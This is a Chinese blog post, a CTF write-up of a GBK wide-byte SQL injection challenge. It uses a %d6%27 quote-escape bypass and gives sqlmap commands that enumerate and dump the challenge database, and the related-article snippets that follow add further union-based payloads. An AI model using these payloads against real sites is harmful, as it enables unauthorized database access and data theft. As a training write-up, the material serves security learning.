南邮宽字节(sql_gbk)注入

最新推荐文章于 2023-10-10 12:37:18 发布
最新推荐文章于 2023-10-10 12:37:18 发布
阅读量954 收藏
点赞数
分类专栏: 渗透测试 文章标签: sqlmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CosmopolitanMe/article/details/82153319
版权

首先题目过滤了单引号,先绕过,用%d6%27来绕过,构成一个宽字节,取消了单引号的转义,直接上sqlmap

爆数据库:
python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --current-db

这里写图片描述

爆表名:
python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --tables -D sae-chinalover

这里写图片描述

爆ctf4表里面的数据:
python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --dump -T ctf4 -D sae-chinalover

这里写图片描述

Cosmop01itan
关注
专栏目录
gbk injection
sworddancing is the best one
09-27 969
以下是我在南邮上做的一道宽字节注入题,先将笔记总结于下,题目:   将网址复制下来,因为这将是我们进行注入的数据库的位置所在,因为该题提示是gbk数据库,所以咱们就有利用宽字节注入来解题的思路,接下来咱们用到sql注入工具的一款,sqlmap: 首先我们需要爆出数据库命令如下(爆出当前数据库(%df%27是双字节不转义单引号实现注入的方法--原理我会另外总结一片笔记出来链接:https://b...
南邮CTF injection-3 宽字节注入
include_heqile的博客
03-22 3060
从昨天晚上开始做的,结果踩了一个坑,干到了凌晨1点,电脑都自动关机了,也没做出来,电脑关机之后,又用手机查了一下,知道了应该用表名的16进制形式来进行爆表,然后到今天上午才做完,还是上计组的时候用手机的火狐做的,手机做是真的难受宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码表名库名的十六进制形式: 字符形式的表名: ctf表示成十...
gbk字节注入
左手诗人 右手剑客
06-12 369
<?php //连接数据库部分,注意使用了gbk编码 $conn = mysql_connect('localhost', 'root', 'toor!@#$') or die('bad!'); mysql_query("SET NAMES 'gbk'"); mysql_select_db('test', $conn) OR emMsg("连接数据库失败,未找到您填写的数据库");...
利用GBK字节编码突破PHP单引号转义限制进行SQL注入
Exploit的小站~
04-11 2979
今天看了黑防2009精华本下册《双字节编码:PHP的隐形杀手》一文,深受启发。 当php.ini中magic_quotes_gpc被设置为on时,提交的参数会被转义,例如,单引号会被转义成了'。一下子截断了字符型注入的路。 GBK字节编码:一个汉字用两个字节表示,首字节对应0x81-0xFE,尾字节对应0x40-0xFE(除0x7F),刚好涵盖了对应的编码0x5C。 0xD5 0
gbk字符编码和宽字节sql注入
sworddancing is the best one
09-27 2578
ctf题目中宽字节注入是很常见的问题,我这篇文章的目的就是弄明白其中的原理。 通常来说,一个gbk编码的汉字通常占用两个字节,一个utf-8编码汉字,占用三个字节, 占用3个字节。在php中,我们可以通过输出 echo strlen("和"); 来测试。当将页面编码保存为gbk时输出2,utf-8时输出3。   说了这么多废话,现在来研究一下在SQL注入中,gbk字符编码带来的各种...
CTF从入门到提升之宽字节注入
anquanniu的博客
08-15 1459
CTF入门到放弃 为什么说是从入门到放弃呢?(开个玩笑)如果说大家对CTF有了解的话,其实应该知道CTF是一个什么类型的比赛,这个比赛涉及的范围和影响有多大。如果说你真的想打好比赛,那也是真的非常不容易的,所以说这是非常困难的一件事情,初期可能学着学着就想放弃了,所以我就以这个来作为一个标题,当然本意不是让大家去放弃,就是为了让大家入个门然后再提升! 我会和我朋友一起来完成这门课程的讲解。 课程主...
mysql 南邮ctf_南邮CTF平台WEB题writeup
weixin_39596739的博客
02-07 2610
https://cgctf.nuptsast.com/login1.签到题F12查看网页源代码就有flag2.md5 collision附上题目给的源代码md51 = md5('QNKCDZO');$a = @$_GET['a'];$md52 = @md5($a);if(isset($a)){if ($a != 'QNKCDZO' && $md51 == $md52) {echo ...
南京邮电大学网络攻防训练平台writeup
weixin_34234829的博客
08-13 1532
为了让各位能够好好查看一下,我违规操作了(QAQ)放在随笔里面了(Orz) 本文转自findneo:https://www.cnblogs.com/findneo/p/nupt-ctf-writeup.html 南邮CTF平台网址: http://ctf.nuptsast.com/challenges http://ctf.nuptzj.cn/cha...
MySQL字节注入——关于GBK编码和UTF-8编码
公众号shadow sock7
04-02 5086
参考: http://blog.csdn.net/jnbbwyth/article/details/6991425 https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html这个文件原文只有ASCII字符,当我加上两个汉字之后就不得不变成了UTF-8字符。 iconv这个工具(MacOS, ubuntu和kali好像是自带的)
CG-CTF-Web-GBK Injection
1stPeak's Blog
07-01 1311
GBK Injection 1.题目 2.首先我们进入题目地址,发现下图所示,首先猜测可能存在sql注入 3.于是我们尝试',但被转义了 4.被转义了,那咋办,此时,想到了URL中%df与\结合会变成運,如下图 5.因此我们可以闭合id的值,使用#,--空格或--+来注释最后一个’ 这里对#进行了过滤,但我们可以使用%23进行绕过 –空格也是标准的SQl注释语句,但这里对空格进行了过滤,...
CG CTF WEB GBK Injection
无限迭代中......
07-02 475
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1 题解: ctf4表里有个假flag 1、 id=1%df' and 1=2 %23 2、 id=1%df' order by 2 %23 3、 id=1%df' and 1=2 union select 1,2 %23 4、 id=1%df' and 1=2 uni...
字节注入
u014794949
10-10 264
原因 宽字节注入主要是因为采用了GBK编码,一个gbk编码占用2个字节,一个utf-8占用3个字节 常规手段下只需要闭合单引号即可,但当存在转义处理时,需要对payload进行特殊构造 常规注入手段 select * from users where id = '1' order by 3 # ' limit 0,1 被过滤后会成为 select * from users where id = '1\'' limit 0,1 构造payload 原始数据 代码层过滤 url编码’ 1%d
渗透测试-SQL注入之宽字节注入
lza20001103的博客
04-20 9084
渗透测试-SQL注入之宽字节注入
SQL注入09】宽字符注入基础与实操(基于sqli-labs-less32)
Fighting_hawk的博客
02-20 3985
1. 了解GBK编码简单信息; 2. 理解字节何时会被当做GBK进行解码; 3. 理解宽字符注入的原理; 4. 掌握宽字符注入的方法。
SQL注入——宽字节注入
最新发布
weixin_74991270的博客
10-10 517
1.转义符“\”有些符号想让他当作单纯的字符,而不是当作符号的时候,一般可以用: \符号比如:\’ \\’   这种情况下,‘和"将被当作正常的字符在数据库之中’与"几乎没有区别,在php之中 ’ 包括的内容完全当作字符串,而 " 包括的内容会进一步进行解析例如:$a=‘hello’;echo ‘$a’;//输出:aecho “$a”;//输出:hello2.为什么产生编码:--为了处理英文字符,产生了ASCII码。
字节(宽字符)注入
Yatere的天平秤
04-24 2046
字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠/,变成了 %df/’,其中/的十六进制是 %5C ,那么现在 %df/’ = %df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MYSQLGBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df/’ = %df%5c%27=縗’,有了单引号就好注入了。比如:$conn = mysql_connect(”localho
DVWA——改GBK尝试宽字节注入(brute教程)
tempulcc的博客
09-04 505
为了测试DWVA中brute项目的medium等级的宽字节注入,学会了命令行改变数据库、数据表的字符编码,学会如何编写数据库连接代码,证实确实可以用宽字节绕过addslashes、mysqli_real_escape_string,mysqli_real_escape_string并不像别人所说的不会导致宽字节注入。唯一可惜的是直接在dvwa代谢medium.php并未成功,需要单独放到网站根目录下测试,已脱离dvwa系统的初始化代码的控制。
NCTF之GBK Injection另一种宽字节注入解法
克格莫(有需要的私信)
12-18 476
0x00题目: your sql:select id,title from news where id = '1' here is the information 0x01以前的题解是使用%df加上单引号,通过宽字节注入。另外#被转移,故使用%23代替#绕过。 但是今天我做的时候,发现另一个payload也可以: payload: 1’',此处第一个单引号是中文的 ‘,第二个单引号是英...
GBK字符集下addslashes函数的注入漏洞及BUG的解决办法
kendyhj9999的专栏
03-26 1183
大家都知道,addslashes是过滤垃圾信息的函数,如果你的PHP环境打开了魔法函数,那么addslashes这个函数将自动运行对用户提交的信 息进行过滤。但是addslashes函数在进行转义的时候,只对二进制字符串操作二不考虑字符集,结果产生BUG和漏洞。关于漏洞的产生,大家可以去百 度搜索《PHP字符编码绕过漏洞总结》,注入我不细说了,主要说说BUG。 首先要说明的是,此BUG只会在
字节SQL注入基础与实战解析
"宽字节SQL注入是Web安全领域中一种常见的攻击手段,主要涉及到字符编码与数据库处理方式的交互问题。在本节中,我们将深入探讨宽字节注入的基础概念、代码分析、实际演示以及如何使用Sqlmap进行安全测试。 宽字节...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值